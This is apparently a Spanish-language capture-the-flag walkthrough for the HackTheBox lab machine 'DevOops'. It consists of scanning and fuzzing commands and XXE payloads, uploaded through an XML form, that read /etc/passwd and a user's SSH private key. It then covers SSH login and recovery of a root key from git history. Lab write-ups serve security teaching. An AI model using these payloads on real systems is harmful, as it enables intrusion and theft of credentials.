echo "10.129.1.79  devoops.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA devoops 10.129.1.79 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA devoops 10.129.1.79

nmap -sU -O -p- -oA devoops-udp 10.129.1.79

nikto -h 10.129.1.79:5000

gobuster dir -k -u http://10.129.1.79/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

mkdir Devoops

cd !$

mkt

cd nmap

nmap -p- --open -T5 -v -n 10.129.1.79

nmap -p- --open -T5 -v -n 10.129.1.79 -oG allPorts

Pasted image 20210814165109.png

extractPorts allPorts

nmap -sCV -p22,5000 10.129.1.79 -oN targeted

Pasted image 20210814165333.png


whatweb http://10.129.1.79:5000

Pasted image 20210814165439.png

nmap --script http-enum -p5000 10.129.1.79 -oN webScan

Pasted image 20210814165642.png

Nos dirigimos a http://10.129.1.79:5000

Pasted image 20210814165733.png

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.79:5000/FUZZ

Pasted image 20210814171149.png

Vamos a upload y vemos que se puede subir un archivo xml.

Pasted image 20210814180136.png

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
  [<!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file///etc/passwd" >]>
<elements>
  <Author>`&xxe;`</Author>
  <Subject>`mypass`</Subject>
  <Content>`mypass`</Content>
</elements>

Pasted image 20210814180811.png

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
  [<!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file///home/roosa/.ssh/id_rsa" >]>
<elements>
  <Author>`&xxe;`</Author>
  <Subject>`mypass`</Subject>
  <Content>`mypass`</Content>
</elements>

Pasted image 20210814180942.png

Copiamos lo que encontramos en id_rsa y creamos uno en nuestra maquina kali.

chmod 600 id_rsa

ssh roosa@10.129.1.79 -i id_rsa

Pasted image 20210814181256.png

Pasted image 20210814181847.png

find \-type f 2>/dev/null | grep -v"\.\local"

Pasted image 20210814182338.png

Hacemos un git log y vemos el cambio.

Pasted image 20210814182230.png

Nos vamos al directorio work/blogfeed.

find \-name authcredentials.key | xargs cat

Pasted image 20210814182548.png

Copiamos lo que esta en rojo y quitamos el - al comienzo de cada linea. Lo guardamos en un archivo id_rsa

Pasted image 20210814183556.png

ssh root@10.129.1.79 -i id_rsa

Pasted image 20210814184056.png

boxes

copyright©2022 Cu3rv0x all rights reserved